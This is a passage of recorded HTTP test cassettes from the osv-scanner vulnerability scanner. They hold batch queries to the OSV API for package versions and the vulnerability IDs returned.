"2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, {}, { "vulns": [ { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, { "vulns": [ { "id": "GHSA-43qf-4rqw-9q2g", "modified": "2026-02-04T02:30:19.251090Z" }, { "id": "GHSA-7rxf-gvfg-47g4", "modified": "2026-02-04T04:27:15.173118Z" }, { "id": "GHSA-84pr-m4jr-85g5", "modified": "2026-02-04T02:57:32.875272Z" }, { "id": "GHSA-8vgw-p6qm-5gr7", "modified": "2026-02-04T02:42:09.564281Z" }, { "id": "GHSA-hxwh-jpp2-84pm", "modified": "2026-02-04T02:15:39.891834Z" }, { "id": "GHSA-xc3p-ff3m-f46v", "modified": "2024-09-20T20:01:25.449661Z" }, { "id": "PYSEC-2020-43", "modified": "2025-10-09T07:22:50.566622Z" }, { "id": "PYSEC-2024-71", "modified": "2025-10-09T08:27:44.186589Z" } ] }, { "vulns": [ { "id": "PYSEC-2020-73", "modified": "2023-11-08T04:02:12.263851Z" } ] } ] } headers: Content-Length: - "4809" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 638 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "npm", "name": "has-flag" }, "version": "4.0.0" }, { "package": { "ecosystem": "npm", "name": "wrappy" }, "version": "1.0.2" }, { "package": 
{ "ecosystem": "Packagist", "name": "league/flysystem" }, "version": "1.0.8" }, { "package": { "ecosystem": "Go", "name": "stdlib" }, "version": "1.99.9" }, { "package": { "ecosystem": "Go", "name": "toolchain" }, "version": "1.99.9" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/spdx_2.3_output url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 107 body: | { "results": [ {}, {}, { "vulns": [ { "id": "GHSA-9f46-5r25-5wfm", "modified": "2026-03-13T22:01:08.982482Z" } ] }, {}, {} ] } headers: Content-Length: - "107" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/verbosity_level_=_error url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand/verbosity_level_=_info url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommandNonGit.yaml ================================================ --- version: 
2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 151 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Packagist", "name": "sentry/sdk" }, "version": "2.0.4" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommandNonGit/one_specific_supported_lockfile url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 16 body: | { "results": [ {} ] } headers: Content-Length: - "16" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_CallAnalysis.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 427 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf" }, "version": "1.3.1" }, { "package": { "ecosystem": "Go", "name": "github.com/ipfs/go-bitfield" }, "version": "1.0.0" }, { "package": { "ecosystem": "Go", "name": "golang.org/x/image" }, "version": "0.4.0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_CallAnalysis/Run_with_govulncheck url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 798 body: | { "results": [ { "vulns": [ { "id": "GHSA-c3h9-896r-86jm", "modified": "2026-02-04T02:43:17.273837Z" }, { "id": "GO-2021-0053", "modified": "2026-02-04T03:28:45.369468Z" } ] }, { "vulns": [ { "id": "GHSA-2h6c-j3gf-xp9r", "modified": "2023-11-08T04:11:41.796349Z" }, { "id": "GO-2023-1558", "modified": "2024-05-20T16:03:47Z" } ] }, { "vulns": [ { "id": "GHSA-9phm-fm57-rhg8", "modified": "2026-02-04T03:56:37.185672Z" }, { "id": "GHSA-j3p8-6mrq-6g7h", "modified": "2024-05-20T21:54:17Z" }, { "id": "GHSA-qgc7-mgm3-q253", "modified": "2024-05-20T21:46:58Z" }, 
{ "id": "GHSA-x92r-3vfx-4cv3", "modified": "2024-05-20T21:54:21Z" }, { "id": "GO-2023-1572", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2023-1989", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2023-1990", "modified": "2024-05-20T16:03:47Z" }, { "id": "GO-2024-2937", "modified": "2026-02-04T03:54:25.251608Z" } ] } ] } headers: Content-Length: - "798" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 158 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf" }, "version": "1.3.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 158 body: | { "results": [ { "vulns": [ { "id": "GHSA-c3h9-896r-86jm", "modified": "2026-02-04T02:43:17.273837Z" }, { "id": "GO-2021-0053", "modified": "2026-02-04T03:28:45.369468Z" } ] } ] } headers: Content-Length: - "158" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 158 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Go", "name": "github.com/gogo/protobuf" }, "version": "1.3.1" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_CallAnalysis/Run_with_govulncheck_all_uncalled_but_enabled_all-vulns_flag url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 158 body: | { "results": [ { "vulns": [ { "id": "GHSA-c3h9-896r-86jm", "modified": "2026-02-04T02:43:17.273837Z" }, { "id": "GO-2021-0053", "modified": "2026-02-04T03:28:45.369468Z" } ] } ] } headers: Content-Length: - "158" Content-Type: - application/json status: 200 OK code: 200 duration: 0s 
================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_CommitSupport.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 814 host: api.osv.dev body: | { "queries": [ { "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7" }, { "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7" }, { "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7" }, { "commit": "931a40a746f5678dcc4625b06a2eb25fa4f00b34" }, { "commit": "17b30e96476be70b8773b2b807bab857fd3ceb39" }, { "commit": "1a9dda41fbfb0dfbec17ab6afeba8138265395f7" }, { "commit": "f82211036f434593c69b8e3680ea65203a46d315" }, { "commit": "45fda76bc1b9fd74d10e85e0ce9b65a12dcc58b0" }, { "commit": "aea7aaf2abb04789f5868cbabec406ea43aa84bf" }, { "commit": "3b064fdb022912bbb98f5b8d9d111aeb6fec8f79" }, { "commit": "0f428d190410263e4daa65b917c0e84707a9c0ef" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_CommitSupport/online_uses_git_commits url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 3821 body: | { "results": [ { "vulns": [ { "id": "OSV-2018-389", "modified": "2022-04-13T03:04:40.912286Z" } ] }, { "vulns": [ { "id": "OSV-2018-389", "modified": "2022-04-13T03:04:40.912286Z" } ] }, { "vulns": [ { "id": "OSV-2018-389", "modified": "2022-04-13T03:04:40.912286Z" } ] }, { "vulns": [ { "id": "CVE-2023-44398", "modified": "2026-03-14T12:15:05.895469Z" }, { "id": "CVE-2024-24826", "modified": "2026-03-14T12:31:29.719981Z" }, { "id": "CVE-2024-25112", "modified": "2026-03-14T12:27:30.328627Z" }, { "id": "CVE-2024-39695", "modified": "2026-03-14T12:34:50.263863Z" }, { "id": "CVE-2025-26623", "modified": "2026-03-08T15:58:57.067224Z" }, { "id": "CVE-2025-54080", "modified": "2026-03-08T15:58:53.801236Z" }, { "id": "CVE-2025-55304", "modified": "2026-03-08T15:59:02.674652Z" }, { 
"id": "CVE-2026-25884", "modified": "2026-03-08T15:58:58.717366Z" }, { "id": "CVE-2026-27596", "modified": "2026-03-03T02:56:32.656501Z" }, { "id": "CVE-2026-27631", "modified": "2026-03-08T16:18:26.088498Z" }, { "id": "OSV-2023-1161", "modified": "2025-03-18T00:34:06.623648Z" }, { "id": "OSV-2024-340", "modified": "2026-03-18T14:24:19.040933Z" }, { "id": "PYSEC-2023-233", "modified": "2025-10-09T08:26:40.736495Z" } ] }, { "vulns": [ { "id": "CVE-2021-22569", "modified": "2026-03-15T14:08:15.471655Z" }, { "id": "CVE-2022-1941", "modified": "2026-03-15T22:44:13.683347Z" }, { "id": "CVE-2022-3171", "modified": "2026-03-14T15:01:36.349851Z" }, { "id": "CVE-2022-3509", "modified": "2026-03-14T11:46:42.854777Z" }, { "id": "CVE-2022-3510", "modified": "2026-03-14T11:46:31.172987Z" }, { "id": "CVE-2024-2410", "modified": "2026-03-14T12:30:27.419430Z" }, { "id": "CVE-2024-7254", "modified": "2026-03-12T17:24:46.870042Z" } ] }, { "vulns": [ { "id": "OSV-2018-389", "modified": "2022-04-13T03:04:40.912286Z" } ] }, { "vulns": [ { "id": "CVE-2024-51757", "modified": "2026-03-14T12:38:40.503950Z" }, { "id": "CVE-2025-61927", "modified": "2026-03-14T12:44:19.001278Z" }, { "id": "CVE-2025-62410", "modified": "2025-12-05T10:21:14.984236Z" } ] }, { "vulns": [ { "id": "CVE-2024-12797", "modified": "2026-03-15T14:13:01.994465Z" }, { "id": "CVE-2024-13176", "modified": "2026-03-15T22:49:27.674006Z" }, { "id": "CVE-2024-9143", "modified": "2026-03-15T22:52:44.104304Z" }, { "id": "CVE-2025-9230", "modified": "2026-03-15T21:45:01.944849Z" }, { "id": "CVE-2025-9231", "modified": "2026-03-15T21:45:14.388367Z" }, { "id": "CVE-2025-9232", "modified": "2026-03-15T22:22:16.665069Z" } ] }, { "vulns": [ { "id": "CVE-2025-11187", "modified": "2026-03-13T22:14:04.753650Z" }, { "id": "CVE-2025-15467", "modified": "2026-03-15T22:51:41.488774Z" }, { "id": "CVE-2025-15468", "modified": "2026-03-15T22:51:46.393921Z" }, { "id": "CVE-2025-15469", "modified": "2026-03-15T14:52:52.732682Z" }, { "id": 
"CVE-2025-66199", "modified": "2026-03-15T14:15:22.516013Z" }, { "id": "CVE-2025-68160", "modified": "2026-03-15T22:52:16.241316Z" }, { "id": "CVE-2025-69418", "modified": "2026-03-15T22:52:15.052519Z" }, { "id": "CVE-2025-69419", "modified": "2026-03-15T22:52:23.255585Z" }, { "id": "CVE-2025-69420", "modified": "2026-03-15T14:54:02.448397Z" }, { "id": "CVE-2025-9230", "modified": "2026-03-15T21:45:01.944849Z" }, { "id": "CVE-2025-9231", "modified": "2026-03-15T21:45:14.388367Z" }, { "id": "CVE-2025-9232", "modified": "2026-03-15T22:22:16.665069Z" }, { "id": "CVE-2026-22795", "modified": "2026-03-15T14:55:17.107605Z" }, { "id": "CVE-2026-22796", "modified": "2026-03-15T22:54:02.133546Z" }, { "id": "CVE-2026-2673", "modified": "2026-03-15T14:54:45.482332Z" } ] }, { "vulns": [ { "id": "CVE-2023-53159", "modified": "2026-03-11T18:20:56.090230Z" }, { "id": "CVE-2023-6180", "modified": "2026-03-13T21:59:51.199646Z" }, { "id": "CVE-2025-24898", "modified": "2026-02-04T02:18:45.944425Z" }, { "id": "CVE-2025-3416", "modified": "2026-03-14T15:04:13.605678Z" } ] }, { "vulns": [ { "id": "CVE-2016-10931", "modified": "2026-03-14T09:18:29.278606Z" }, { "id": "CVE-2018-20997", "modified": "2026-03-14T09:29:08.646634Z" }, { "id": "CVE-2023-53159", "modified": "2026-03-11T18:20:56.090230Z" }, { "id": "CVE-2023-6180", "modified": "2026-03-13T21:59:51.199646Z" }, { "id": "CVE-2025-3416", "modified": "2026-03-14T15:04:13.605678Z" } ] } ] } headers: Content-Length: - "3821" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/source/testdata/cassettes/TestCommand_Config_UnusedIgnores.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 1852 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { 
"ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_Config_UnusedIgnores/unused_ignores_are_reported_with_specific_config_and_file url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 433 body: | { "results": [ {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-26519", "modified": "2025-12-11T11:16:21.978419Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2018-25032", "modified": "2025-12-03T22:47:03.844688Z" }, { "id": "ALPINE-CVE-2022-37434", "modified": "2025-12-03T22:50:43.469206Z" }, { "id": "ALPINE-CVE-2026-22184", "modified": "2026-03-09T02:10:12.057314Z" }, { "id": "ALPINE-CVE-2026-27171", "modified": "2026-03-09T02:09:33.041671Z" } ] } ] } headers: Content-Length: - "433" Content-Type: - application/json status: 200 OK code: 
200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 23023 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.12-r1" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-keys" }, "version": "2.4-r1" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "ca-certificates-bundle" }, "version": "20220614-r4" }, { "package": { "ecosystem": "Alpine", "name": "libc-utils" }, "version": "0.7.2-r3" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Alpine", "name": "ssl_client" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "zlib" }, "version": "1.2.10-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "alpine-baselayout-data" }, "version": "3.4.0-r0" }, { "package": { "ecosystem": "Alpine", "name": "apk-tools" }, "version": "2.12.10-r1" }, { "package": { "ecosystem": "Alpine", "name": "busybox-binsh" }, "version": "1.36.1-r27" }, { "package": { "ecosystem": "Alpine", "name": "libcrypto3" }, "version": "3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "libssl3" }, "version": 
"3.0.8-r0" }, { "package": { "ecosystem": "Alpine", "name": "musl-utils" }, "version": "1.2.3-r4" }, { "package": { "ecosystem": "Alpine", "name": "scanelf" }, "version": "1.3.5-r1" }, { "package": { "ecosystem": "Ubuntu", "name": "pcre3" }, "version": "2:8.39-12ubuntu0.1" }, { "package": { "ecosystem": "Debian", "name": "adduser" }, "version": "3.115" }, { "package": { "ecosystem": "Debian", "name": "apt" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "base-files" }, "version": "9.9+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "base-passwd" }, "version": "3.5.43" }, { "package": { "ecosystem": "Debian", "name": "bash" }, "version": "4.4-5" }, { "package": { "ecosystem": "Debian", "name": "bsdutils" }, "version": "1:2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "coreutils" }, "version": "8.26-3" }, { "package": { "ecosystem": "Debian", "name": "dash" }, "version": "0.5.8-2.4" }, { "package": { "ecosystem": "Debian", "name": "debconf" }, "version": "1.5.61" }, { "package": { "ecosystem": "Debian", "name": "debian-archive-keyring" }, "version": "2017.5+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "debianutils" }, "version": "4.8.1.1" }, { "package": { "ecosystem": "Debian", "name": "diffutils" }, "version": "1:3.5-3" }, { "package": { "ecosystem": "Debian", "name": "dirmngr" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "dpkg" }, "version": "1.18.25" }, { "package": { "ecosystem": "Debian", "name": "e2fslibs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "e2fsprogs" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "findutils" }, "version": "4.6.0+git+20161106-2" }, { "package": { "ecosystem": "Debian", "name": "gcc-6-base" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Go", "name": "github.com/opencontainers/runc" }, "version": "v1.0.1" }, { "package": { "ecosystem": "Go", "name": 
"github.com/tianon/gosu" }, "version": "(devel)" }, { "package": { "ecosystem": "Debian", "name": "gnupg" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "gnupg-agent" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Go", "name": "golang.org/x/sys" }, "version": "v0.0.0-20210817142637-7d9622a276b7" }, { "package": { "ecosystem": "Debian", "name": "gpgv" }, "version": "2.1.18-8~deb9u4" }, { "package": { "ecosystem": "Debian", "name": "grep" }, "version": "2.27-2" }, { "package": { "ecosystem": "Debian", "name": "gzip" }, "version": "1.6-5+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "hostname" }, "version": "3.18+b1" }, { "package": { "ecosystem": "Debian", "name": "init-system-helpers" }, "version": "1.48" }, { "package": { "ecosystem": "Debian", "name": "libacl1" }, "version": "2.2.52-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libapt-pkg5.0" }, "version": "1.4.11" }, { "package": { "ecosystem": "Debian", "name": "libassuan0" }, "version": "2.4.3-2" }, { "package": { "ecosystem": "Debian", "name": "libattr1" }, "version": "1:2.4.47-2+b2" }, { "package": { "ecosystem": "Debian", "name": "libaudit-common" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libaudit1" }, "version": "1:2.6.7-2" }, { "package": { "ecosystem": "Debian", "name": "libblkid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbsd0" }, "version": "0.8.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libbz2-1.0" }, "version": "1.0.6-8.1" }, { "package": { "ecosystem": "Debian", "name": "libc-bin" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc-l10n" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libc6" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libcap-ng0" }, "version": "0.7.7-3+b1" }, { "package": { "ecosystem": "Debian", "name": "libcomerr2" 
}, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libdb5.3" }, "version": "5.3.28-12+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libdebconfclient0" }, "version": "0.227" }, { "package": { "ecosystem": "Debian", "name": "libedit2" }, "version": "3.1-20160903-3" }, { "package": { "ecosystem": "Debian", "name": "libfdisk1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libffi6" }, "version": "3.2.1-6" }, { "package": { "ecosystem": "Debian", "name": "libgcc1" }, "version": "1:6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgcrypt20" }, "version": "1.7.6-2+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "libgdbm3" }, "version": "1.8.3-14" }, { "package": { "ecosystem": "Debian", "name": "libgmp10" }, "version": "2:6.1.2+dfsg-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libgnutls30" }, "version": "3.5.8-5+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libgpg-error0" }, "version": "1.26-2" }, { "package": { "ecosystem": "Debian", "name": "libgssapi-krb5-2" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libhogweed4" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libicu57" }, "version": "57.1-6+deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libidn11" }, "version": "1.33-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libjson-perl" }, "version": "2.90-1" }, { "package": { "ecosystem": "Debian", "name": "libk5crypto3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkeyutils1" }, "version": "1.5.9-9" }, { "package": { "ecosystem": "Debian", "name": "libkrb5-3" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libkrb5support0" }, "version": "1.15-1+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libksba8" }, "version": "1.3.5-2" }, { "package": { "ecosystem": "Debian", "name": 
"libldap-2.4-2" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libldap-common" }, "version": "2.4.44+dfsg-5+deb9u8" }, { "package": { "ecosystem": "Debian", "name": "libllvm6.0" }, "version": "1:6.0-1~bpo9+1" }, { "package": { "ecosystem": "Debian", "name": "liblz4-1" }, "version": "0.0~r131-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "liblzma5" }, "version": "5.2.2-1.2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libmount1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libncurses5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libncursesw5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libnettle6" }, "version": "3.3-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libnpth0" }, "version": "1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libnss-wrapper" }, "version": "1.1.3-1" }, { "package": { "ecosystem": "Debian", "name": "libp11-kit0" }, "version": "0.23.3-2+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-modules-bin" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam-runtime" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpam0g" }, "version": "1.1.8-3.6" }, { "package": { "ecosystem": "Debian", "name": "libpcre3" }, "version": "2:8.39-3" }, { "package": { "ecosystem": "Debian", "name": "libperl5.24" }, "version": "5.24.1-3+deb9u7" }, { "package": { "ecosystem": "Debian", "name": "libpq5" }, "version": "14.2-1.pgdg90+1" }, { "package": { "ecosystem": "Debian", "name": "libreadline7" }, "version": "7.0-3" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-2" }, "version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libsasl2-modules-db" }, 
"version": "2.1.27~101-g0780600+dfsg-3+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libselinux1" }, "version": "2.6-3+b3" }, { "package": { "ecosystem": "Debian", "name": "libsemanage-common" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsemanage1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsepol1" }, "version": "2.6-2" }, { "package": { "ecosystem": "Debian", "name": "libsmartcols1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsqlite3-0" }, "version": "3.16.2-5+deb9u3" }, { "package": { "ecosystem": "Debian", "name": "libss2" }, "version": "1.43.4-2+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libssl1.1" }, "version": "1.1.0l-1~deb9u5" }, { "package": { "ecosystem": "Debian", "name": "libstdc++6" }, "version": "6.3.0-18+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libsystemd0" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libtasn1-6" }, "version": "4.10-1.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libtinfo5" }, "version": "6.0+20161126-1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libudev1" }, "version": "232-25+deb9u13" }, { "package": { "ecosystem": "Debian", "name": "libustr-1.0-1" }, "version": "1.0.4-6" }, { "package": { "ecosystem": "Debian", "name": "libuuid1" }, "version": "2.29.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "libxml2" }, "version": "2.9.4+dfsg1-2.2+deb9u6" }, { "package": { "ecosystem": "Debian", "name": "libxslt1.1" }, "version": "1.1.29-2.1+deb9u2" }, { "package": { "ecosystem": "Debian", "name": "libzstd1" }, "version": "1.1.2-1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "locales" }, "version": "2.24-11+deb9u4" }, { "package": { "ecosystem": "Debian", "name": "login" }, "version": "1:4.4-4.1+deb9u1" }, { "package": { "ecosystem": "Debian", "name": "lsb-base" }, "version": "9.20161125" }, { "package": { 
